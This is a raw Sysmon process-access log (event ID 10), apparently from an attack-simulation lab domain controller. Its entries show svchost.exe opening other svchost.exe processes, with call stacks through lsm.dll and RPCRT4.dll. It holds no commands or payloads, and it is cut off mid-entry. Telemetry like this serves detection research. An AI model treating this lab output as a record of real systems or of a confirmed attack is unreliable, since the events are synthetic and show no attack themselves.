13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.180{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.180{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.180{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 